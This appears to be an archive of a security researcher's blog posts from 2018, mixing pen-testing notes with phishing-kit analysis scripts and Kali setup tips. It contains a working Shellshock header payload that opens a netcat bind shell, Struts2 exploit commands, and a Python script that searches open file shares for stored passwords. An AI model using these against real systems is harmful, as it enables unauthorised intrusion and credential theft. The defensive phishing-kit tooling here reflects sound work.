when practicing pen testing on CVE-2014-6271
Burp Suite proxy, repeater, modify user agent
GET / HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh
the repeater will not return because it's waiting for a connection now
open another prompt and launch netcat to connect to port 9999
nc xxx.xxx.xxx.xxx 9999
you are now at the /bin/sh prompt for the compromised system so you can type a command like
"whoami"
Sunday, December 23, 2018
CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE
I found this github page extremely useful when practicing pen testing on CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE
https://github.com/mazen160/struts-pwn_CVE-2017-9805
https://github.com/mazen160/struts-pwn_CVE-2017-9805
Check if the vulnerability exists against a single URL.
python struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'Exploit a single URL.
python struts-pwn.py --exploit --url 'http://example.com/struts2-rest-showcase/orders/3' -c 'touch /tmp/struts-pwn'kali metasploit website auxillary modules
use auxiliary/scanner/http/dir_listing
use auxiliary/scanner/http/dir_scanner
use auxiliary/scanner/http/files_dir
list all nmap scripts available
to see all the nmap scripts available you can list out this directory
ls /usr/share/nmap/scripts/
ls /usr/share/nmap/scripts/
vmware tools kali linux vmplayer
if you got kali linux and the vmware tools isn't working in vmplayer follow these instructions
http://www.vmwarearena.com/how-to-install-vmware-tools-on-kali-linux/
basically
1.) in vmplayer, manage -> install vmware tools
2.) open cd rom in kali
3.) copy .tar.gz to kali
4.) extract the .tar.gz
5.) run the vmware-install.pl
6.) choose all the defaults
7.) boom, vmware tools works again (like copy & paste to/from host)
http://www.vmwarearena.com/how-to-install-vmware-tools-on-kali-linux/
basically
1.) in vmplayer, manage -> install vmware tools
2.) open cd rom in kali
3.) copy .tar.gz to kali
4.) extract the .tar.gz
5.) run the vmware-install.pl
6.) choose all the defaults
7.) boom, vmware tools works again (like copy & paste to/from host)
dirbuster wordlist folder location
If you need a wordlist of directories for the dirbust tool they are located here on a default kali install
/usr/share/wordlists/dirbuster/
/usr/share/wordlists/dirbuster/
Saturday, December 22, 2018
apt-get update fails on Kali KEYEXPIRED
if
apt-get update
apt-get update
fails on Kali
with an error like this
Get:1 http://kali.download/kali kali-rolling InRelease [30.5 kB]
Err:1 http://kali.download/kali kali-rolling InRelease
The following signatures were invalid: KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136
Fetched 30.5 kB in 8s (3,483 B/s)
Reading package lists... Done
W: An error occurred during the signature verification. The repository is not updated and the previous index files will be used. GPG error: http://kali.download/kali kali-rolling InRelease: The following signatures were invalid: KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136
W: Failed to fetch http://http.kali.org/kali/dists/kali-rolling/InRelease The following signatures were invalid: KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136
W: Some index files failed to download. They have been ignored, or old ones used instead.
The fix appears to be these 2 commands that get new keys
wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2018.1_all.deb
apt install ./kali-archive-keyring_2018.1_all.deb
Thursday, December 20, 2018
Qradar API basics
This is where you can find documentation on your qradar api's instance
https://<your qradar url>/api_doc
this tells you about all the various api calls available
you can make calls directly in the browser if your credentials have permission by going to a url such as
https://<your qradar url>/api/siem/offenses
this older blog post gives you more details about connecting the 1st time
https://neonprimetime.blogspot.com/2016/01/qradar-siem-api-101-walk-through.html
https://<your qradar url>/api_doc
this tells you about all the various api calls available
you can make calls directly in the browser if your credentials have permission by going to a url such as
https://<your qradar url>/api/siem/offenses
this older blog post gives you more details about connecting the 1st time
https://neonprimetime.blogspot.com/2016/01/qradar-siem-api-101-walk-through.html
py2exe does not work on python 3.6, use pyinstaller instead
py2exe does not work on python 3.6
use pyinstaller instead
py2exe throws this error
"IndexError: tuple index out of range"
so instead i get pyinstaller by doing this
> pip install pyinstaller
and then running
> pyinstaller.exe --onefile myscript.py
and it generates a working EXE
use pyinstaller instead
py2exe throws this error
"IndexError: tuple index out of range"
so instead i get pyinstaller by doing this
> pip install pyinstaller
and then running
> pyinstaller.exe --onefile myscript.py
and it generates a working EXE
openFileShareWalker.py
# open file share searcher for passwords or restricted documents
import argparse
import os
import re
#definitions
suspiciousFileNames = r'(?i)(\.config|\.txt|\.ini|\.pdf|\.doc|\.xls|\.java|\.sql|\.vbs|\.inf|pwd|password)'
passwordSearchableFileNames = r'(?i)(\.config|\.txt|\.ini|\.java|\.sql|\.vbs|\.inf)'
passwordKeywords = r'(?i)(pwd|password|passwd|getConnection|connectionString)'
falsePositiveFolders = r'(?i)(EPO_REPOSITORY|VSCANDAT|AdaptivaCache|SmsPkg|DriverPkg)'
falsePositiveFileNames = r'(?i)(license|avvdat|uninst)'
suspiciousFiles = []
passwordFiles = []
fileCount = 0
progressInterval = 10000
progressTracker = progressInterval
#arguments
arguments = argparse.ArgumentParser("Search Open File Shares for passwords and restricted documents")
arguments.add_argument("-f", "--folder", type=str, required=True, help="Full UNC path (\\server\share) of open file share to search (note: file:// does not work)")
arguments.add_argument("-d", "--debug", action="store_true", required=False, help="Enable debugging messages")
arguments.add_argument("-p", "--progress", action="store_true", required=False, help="Enable progress tracking")
settings = arguments.parse_args()
#processing
if(settings.debug or settings.progress):
print("starting walk of folder '{0}'".format(settings.folder))
for dname, dirs, files in os.walk(settings.folder):
if(settings.debug):
print("starting walk of sub-folder '{0}'".format(dname))
for fname in files:
fileCount = fileCount + 1
fpath = os.path.join(dname, fname)
if(settings.progress and fileCount >= progressTracker):
print("PROGRESS: {0} files analyzed so far".format(str(fileCount)))
progressTracker = progressTracker + progressInterval
if(settings.debug):
print("analyzing file '{0}'".format(fname))
folderBadMatch = re.search(falsePositiveFolders, fpath)
if(folderBadMatch is None):
match = re.search(suspiciousFileNames, fname)
if(match is not None):
fileBadMatch = re.search(falsePositiveFileNames, fname)
if(fileBadMatch is None):
if(settings.debug):
print("matched file '{0}'".format(fpath))
suspiciousFiles.append(fpath)
if(settings.debug):
print("finished analyzing file '{0}'".format(fname))
if(settings.debug):
print("finished walk of sub-folder '{0}'".format(dname))
if(settings.debug):
print("finished walk of folder '{0}'".format(settings.folder))
if(settings.debug or settings.progress):
print("starting password searching")
for file in suspiciousFiles:
isSearchable = re.search(passwordSearchableFileNames, file)
if(isSearchable is not None):
with open(file) as f:
if(settings.debug):
print("searching for passwords in '{0}'".format(file))
for line in f:
match = re.search(passwordKeywords, line)
if(match is not None):
passwordFiles.append((file, line))
if(settings.debug):
print("finished password searching")
#output
for file in suspiciousFiles:
print(file)
for (file, line) in passwordFiles:
print("POSSIBLE PASSWORD in '{0}' [{1}]".format(file, line))
import argparse
import os
import re
#definitions
suspiciousFileNames = r'(?i)(\.config|\.txt|\.ini|\.pdf|\.doc|\.xls|\.java|\.sql|\.vbs|\.inf|pwd|password)'
passwordSearchableFileNames = r'(?i)(\.config|\.txt|\.ini|\.java|\.sql|\.vbs|\.inf)'
passwordKeywords = r'(?i)(pwd|password|passwd|getConnection|connectionString)'
falsePositiveFolders = r'(?i)(EPO_REPOSITORY|VSCANDAT|AdaptivaCache|SmsPkg|DriverPkg)'
falsePositiveFileNames = r'(?i)(license|avvdat|uninst)'
suspiciousFiles = []
passwordFiles = []
fileCount = 0
progressInterval = 10000
progressTracker = progressInterval
#arguments
arguments = argparse.ArgumentParser("Search Open File Shares for passwords and restricted documents")
arguments.add_argument("-f", "--folder", type=str, required=True, help="Full UNC path (\\server\share) of open file share to search (note: file:// does not work)")
arguments.add_argument("-d", "--debug", action="store_true", required=False, help="Enable debugging messages")
arguments.add_argument("-p", "--progress", action="store_true", required=False, help="Enable progress tracking")
settings = arguments.parse_args()
#processing
if(settings.debug or settings.progress):
print("starting walk of folder '{0}'".format(settings.folder))
for dname, dirs, files in os.walk(settings.folder):
if(settings.debug):
print("starting walk of sub-folder '{0}'".format(dname))
for fname in files:
fileCount = fileCount + 1
fpath = os.path.join(dname, fname)
if(settings.progress and fileCount >= progressTracker):
print("PROGRESS: {0} files analyzed so far".format(str(fileCount)))
progressTracker = progressTracker + progressInterval
if(settings.debug):
print("analyzing file '{0}'".format(fname))
folderBadMatch = re.search(falsePositiveFolders, fpath)
if(folderBadMatch is None):
match = re.search(suspiciousFileNames, fname)
if(match is not None):
fileBadMatch = re.search(falsePositiveFileNames, fname)
if(fileBadMatch is None):
if(settings.debug):
print("matched file '{0}'".format(fpath))
suspiciousFiles.append(fpath)
if(settings.debug):
print("finished analyzing file '{0}'".format(fname))
if(settings.debug):
print("finished walk of sub-folder '{0}'".format(dname))
if(settings.debug):
print("finished walk of folder '{0}'".format(settings.folder))
if(settings.debug or settings.progress):
print("starting password searching")
for file in suspiciousFiles:
isSearchable = re.search(passwordSearchableFileNames, file)
if(isSearchable is not None):
with open(file) as f:
if(settings.debug):
print("searching for passwords in '{0}'".format(file))
for line in f:
match = re.search(passwordKeywords, line)
if(match is not None):
passwordFiles.append((file, line))
if(settings.debug):
print("finished password searching")
#output
for file in suspiciousFiles:
print(file)
for (file, line) in passwordFiles:
print("POSSIBLE PASSWORD in '{0}' [{1}]".format(file, line))
Wednesday, December 19, 2018
phishingKitTracker.py
# phishing kit parser, used to enrich kit and put into PhishingKitTracker csv format
# @neonprimetime
# https://github.com/neonprimetime/PhishingKitTracker/
import argparse
import zipfile
import urllib.request
from urllib.parse import urlparse
import os
from pathlib import Path
import re
from datetime import date
import hashlib
import shutil
#definitions
class PhishingKitTrackerEntry:
date = date.today().strftime('%m/%d/%Y')
reference = ""
email = ""
emailProvider = ""
mailer = ""
target = ""
domain = ""
zip = ""
threatActor = ""
md5 = ""
url = ""
entries = []
proceed = 1
domain = ""
mailer = ""
filename = ""
md5 = ""
threatActor = ""
itemList = []
isUrls = 0
extractedfoldername = ""
#arguments
arguments = argparse.ArgumentParser("Analyze Phishing Kit, pass 1 url or file to start")
arguments.add_argument("-u", "--url", type=str, required=False, help="Url to a Phishing Kit Zip file")
arguments.add_argument("-f", "--file", type=str, required=False, help="Path to a Phishing Kit Zip file")
arguments.add_argument("-d", "--debug", action="store_true", required=False, help="Enable debugging messages")
arguments.add_argument("-r", "--reference", type=str, required=False, help="Twitter url referencing Phishing Kit")
arguments.add_argument("-l", "--listUrls", type=str, required=False, help="Path to file with a list of Urls to Phishing Kit Zip files in it 1 per line")
arguments.add_argument("-i", "--listFiles", type=str, required=False, help="Path to file with a list of Phishing Kit Zip files 1 per line")
settings = arguments.parse_args()
if(settings.url is None):
if(settings.file is None):
if(settings.listUrls is None):
if(settings.listFiles is None):
if(settings.debug):
print("no url, file, or list param found")
proceed = 0
raise Exception("url (-u) or file (-f) or list (-l,-i) required")
else:
if(settings.debug):
print("list of files param found '{0}'".format(settings.listFiles))
with open(settings.listFiles) as f:
for line in f:
itemList.append(line.rstrip("\r\n"))
else:
if(settings.debug):
print("list of urls param found '{0}'".format(settings.listUrls))
with open(settings.listUrls) as f:
for line in f:
itemList.append(line.rstrip("\r\n"))
isUrls = 1
else:
if(settings.debug):
print("file param found'{0}'".format(settings.file))
itemList.append(settings.file)
else:
if(settings.debug):
print("url param found '{0}'".format(settings.url))
itemList.append(settings.url)
isUrls = 1
#processing
if(proceed == 1):
for item in itemList:
if(isUrls == 0):
filename = item
else:
try:
url = urlparse(item)
domain = url.netloc
filename = os.path.basename(url.path)
if(settings.debug):
print("found domain '{0}'".format(domain))
print("found filename '{0}'".format(filename))
urllib.request.urlretrieve(item, filename)
if(settings.debug):
print("url downloaded '{0}'".format(item))
except:
print("failed to download '{0}'".format(item))
continue
extractedfoldername = str(Path(filename).with_suffix(""))
if(settings.debug):
print("getting file hash for '{0}'".format(filename))
file = open(filename, 'rb')
with file:
md5 = hashlib.md5(file.read()).hexdigest()
if(settings.debug):
print("unzipping file '{0}' to '{1}'".format(filename,extractedfoldername))
with zipfile.ZipFile(filename,'r') as zip_ref:
zip_ref.extractall(extractedfoldername)
if(settings.debug):
print("file unzipped to '{0}'".format(extractedfoldername))
if(settings.debug):
print("starting search for Threat Actor Signatures")
foundActor = 0
for dname, dirs, files in os.walk(extractedfoldername):
if(foundActor == 0):
for fname in files:
fpath = os.path.join(dname, fname)
extension = os.path.splitext(fpath)[1]
if(settings.debug):
print("found file '{0}' with extension '{1}'".format(fpath,extension))
if(extension is not None and extension == ".php"):
if(settings.debug):
print("searching file '{0}'".format(fpath))
with open(fpath) as f:
line = f.read()
match = re.search(r'(?i)(created by|hacked by|coded by|edited by|signed by|made by)([^\r\n\=\+\"\'\,]+)\s+([\,\=\+\"\']|\-\-)', line)
if(match is not None):
threatActor = match.group(1) + match.group(2)
foundActor = 1
break
if(settings.debug):
print("finished search for Threat Actor Signatures")
if(settings.debug):
print("starting search for Threat Actor Emails")
for dname, dirs, files in os.walk(extractedfoldername):
for fname in files:
fpath = os.path.join(dname, fname)
mailer = os.path.basename(fpath)
extension = os.path.splitext(fpath)[1]
if(settings.debug):
print("found file '{0}' with extension '{1}'".format(fpath,extension))
if(extension is not None and extension == ".php"):
if(settings.debug):
print("searching file '{0}'".format(fpath))
with open(fpath) as f:
line = f.read()
matches = re.findall(r'[\w\.-]+@[\w\.-]+', line)
for match in matches:
if(settings.debug):
print("found threat actor email '{0}'".format(match))
entry = PhishingKitTrackerEntry()
if(settings.reference is not None):
entry.reference = settings.reference
entry.email = match
entry.emailProvider = match.split('@')[1].split('.')[0]
entry.mailer = mailer
entry.domain = domain
entry.zip = filename
entry.threatActor = threatActor
entry.md5 = md5
if(isUrls == 1):
entry.url = item
entries.append(entry)
if(settings.debug):
print("deleting zip '{0}'".format(filename))
if(filename is not None and filename != "" and ".zip" in filename):
os.remove(filename)
if(settings.debug):
print("deleting folder '{0}'".format(extractedfoldername))
if(extractedfoldername is not None and extractedfoldername != ""):
shutil.rmtree(extractedfoldername, ignore_errors=True)
if(settings.debug):
print("finished search for Threat Actor Emails")
else:
if(settings.debug):
print("exiting program, proceed={0}".format(str(proceed)))
#output
for entry in entries:
print("{0},{1},{2},{3},{4},{5},{6},{7},{8},{9},{10}".format(entry.date,entry.reference,entry.email,entry.emailProvider,entry.mailer,entry.target,entry.domain,entry.zip,entry.threatActor,entry.md5,entry.url))
# @neonprimetime
# https://github.com/neonprimetime/PhishingKitTracker/
import argparse
import zipfile
import urllib.request
from urllib.parse import urlparse
import os
from pathlib import Path
import re
from datetime import date
import hashlib
import shutil
#definitions
class PhishingKitTrackerEntry:
date = date.today().strftime('%m/%d/%Y')
reference = ""
email = ""
emailProvider = ""
mailer = ""
target = ""
domain = ""
zip = ""
threatActor = ""
md5 = ""
url = ""
entries = []
proceed = 1
domain = ""
mailer = ""
filename = ""
md5 = ""
threatActor = ""
itemList = []
isUrls = 0
extractedfoldername = ""
#arguments
arguments = argparse.ArgumentParser("Analyze Phishing Kit, pass 1 url or file to start")
arguments.add_argument("-u", "--url", type=str, required=False, help="Url to a Phishing Kit Zip file")
arguments.add_argument("-f", "--file", type=str, required=False, help="Path to a Phishing Kit Zip file")
arguments.add_argument("-d", "--debug", action="store_true", required=False, help="Enable debugging messages")
arguments.add_argument("-r", "--reference", type=str, required=False, help="Twitter url referencing Phishing Kit")
arguments.add_argument("-l", "--listUrls", type=str, required=False, help="Path to file with a list of Urls to Phishing Kit Zip files in it 1 per line")
arguments.add_argument("-i", "--listFiles", type=str, required=False, help="Path to file with a list of Phishing Kit Zip files 1 per line")
settings = arguments.parse_args()
if(settings.url is None):
if(settings.file is None):
if(settings.listUrls is None):
if(settings.listFiles is None):
if(settings.debug):
print("no url, file, or list param found")
proceed = 0
raise Exception("url (-u) or file (-f) or list (-l,-i) required")
else:
if(settings.debug):
print("list of files param found '{0}'".format(settings.listFiles))
with open(settings.listFiles) as f:
for line in f:
itemList.append(line.rstrip("\r\n"))
else:
if(settings.debug):
print("list of urls param found '{0}'".format(settings.listUrls))
with open(settings.listUrls) as f:
for line in f:
itemList.append(line.rstrip("\r\n"))
isUrls = 1
else:
if(settings.debug):
print("file param found'{0}'".format(settings.file))
itemList.append(settings.file)
else:
if(settings.debug):
print("url param found '{0}'".format(settings.url))
itemList.append(settings.url)
isUrls = 1
#processing
if(proceed == 1):
for item in itemList:
if(isUrls == 0):
filename = item
else:
try:
url = urlparse(item)
domain = url.netloc
filename = os.path.basename(url.path)
if(settings.debug):
print("found domain '{0}'".format(domain))
print("found filename '{0}'".format(filename))
urllib.request.urlretrieve(item, filename)
if(settings.debug):
print("url downloaded '{0}'".format(item))
except:
print("failed to download '{0}'".format(item))
continue
extractedfoldername = str(Path(filename).with_suffix(""))
if(settings.debug):
print("getting file hash for '{0}'".format(filename))
file = open(filename, 'rb')
with file:
md5 = hashlib.md5(file.read()).hexdigest()
if(settings.debug):
print("unzipping file '{0}' to '{1}'".format(filename,extractedfoldername))
with zipfile.ZipFile(filename,'r') as zip_ref:
zip_ref.extractall(extractedfoldername)
if(settings.debug):
print("file unzipped to '{0}'".format(extractedfoldername))
if(settings.debug):
print("starting search for Threat Actor Signatures")
foundActor = 0
for dname, dirs, files in os.walk(extractedfoldername):
if(foundActor == 0):
for fname in files:
fpath = os.path.join(dname, fname)
extension = os.path.splitext(fpath)[1]
if(settings.debug):
print("found file '{0}' with extension '{1}'".format(fpath,extension))
if(extension is not None and extension == ".php"):
if(settings.debug):
print("searching file '{0}'".format(fpath))
with open(fpath) as f:
line = f.read()
match = re.search(r'(?i)(created by|hacked by|coded by|edited by|signed by|made by)([^\r\n\=\+\"\'\,]+)\s+([\,\=\+\"\']|\-\-)', line)
if(match is not None):
threatActor = match.group(1) + match.group(2)
foundActor = 1
break
if(settings.debug):
print("finished search for Threat Actor Signatures")
if(settings.debug):
print("starting search for Threat Actor Emails")
for dname, dirs, files in os.walk(extractedfoldername):
for fname in files:
fpath = os.path.join(dname, fname)
mailer = os.path.basename(fpath)
extension = os.path.splitext(fpath)[1]
if(settings.debug):
print("found file '{0}' with extension '{1}'".format(fpath,extension))
if(extension is not None and extension == ".php"):
if(settings.debug):
print("searching file '{0}'".format(fpath))
with open(fpath) as f:
line = f.read()
matches = re.findall(r'[\w\.-]+@[\w\.-]+', line)
for match in matches:
if(settings.debug):
print("found threat actor email '{0}'".format(match))
entry = PhishingKitTrackerEntry()
if(settings.reference is not None):
entry.reference = settings.reference
entry.email = match
entry.emailProvider = match.split('@')[1].split('.')[0]
entry.mailer = mailer
entry.domain = domain
entry.zip = filename
entry.threatActor = threatActor
entry.md5 = md5
if(isUrls == 1):
entry.url = item
entries.append(entry)
if(settings.debug):
print("deleting zip '{0}'".format(filename))
if(filename is not None and filename != "" and ".zip" in filename):
os.remove(filename)
if(settings.debug):
print("deleting folder '{0}'".format(extractedfoldername))
if(extractedfoldername is not None and extractedfoldername != ""):
shutil.rmtree(extractedfoldername, ignore_errors=True)
if(settings.debug):
print("finished search for Threat Actor Emails")
else:
if(settings.debug):
print("exiting program, proceed={0}".format(str(proceed)))
#output
for entry in entries:
print("{0},{1},{2},{3},{4},{5},{6},{7},{8},{9},{10}".format(entry.date,entry.reference,entry.email,entry.emailProvider,entry.mailer,entry.target,entry.domain,entry.zip,entry.threatActor,entry.md5,entry.url))
Wednesday, December 12, 2018
regex extract zip, php, email from grep of phishingkit
after using this grep
https://neonprimetime.blogspot.com/2018/12/grep-recursively-phishing-kit-zip-for.html
in notepad++ you can regex out the zip name, php file name, and email address
replace this
\r\n([^\\]+)\\[^\r]+\\([^\\]+\.php)\:[^\r]+(\"|\')([^\"\'\r]+)(\"|\')[^\r]*
with this
\r\n\1,\2,\4
Monday, December 3, 2018
findstr recursively phishing kit zip for email
after unzipped
findstr /S "@" *.php | findstr "$" | findstr "=" | findstr ";" | findstr "." | findstr /I /V "From" | findstr /I /V "headers" |findstr /I /V "function" | findstr /I /V "key" | findstr /I /V "indexOf" | findstr /I /V "class" | findstr /I /V "isset" | findstr /I /V "@date" | findstr /I /V "server" | findstr /I /V "http" | findstr /I /V "css" | findstr /I /V "style" | findstr /I /V "?" | findstr /I /V "@eval"
Saturday, December 1, 2018
grep recursively phishing kit zip for email
find email
// $send = "bad@bad.com";
grep -r -P '\=\s*.([a-zA-Z][\w\_\.]{5,20})\@([a-zA-Z0-9.-]+)\.([a-zA-Z]{2,4})' | grep -v -P '(?i)(from|headers|array|messsage|find|domain)'
// mail("bad@bad.com", ...)
grep -r -P 'mail\([^\r\n]+\@'
find who created it
// ------ HACKED BY Somebody ----------
grep -r -P "(?i)(Created By|Hacked by|Coded by|Edited By|Signed by|Made by)" * | grep -v function
unzip all files to folder with same name
unzip files to a folder with the same name
>ls
abc.zip
bob.zip
test.zip
>find . -name "*.zip" | while read filename; do unzip -o -d "`basename -s .zip "$filename"`" "$filename"; done;
>ls
abc
abc.zip
bob
bob.zip
test
test.zip
wget -i Urls.txt
download a list of #phishingkit zips
put files into urls.txt
run command
wget -i urls.txt
Subscribe to:
Posts (Atom)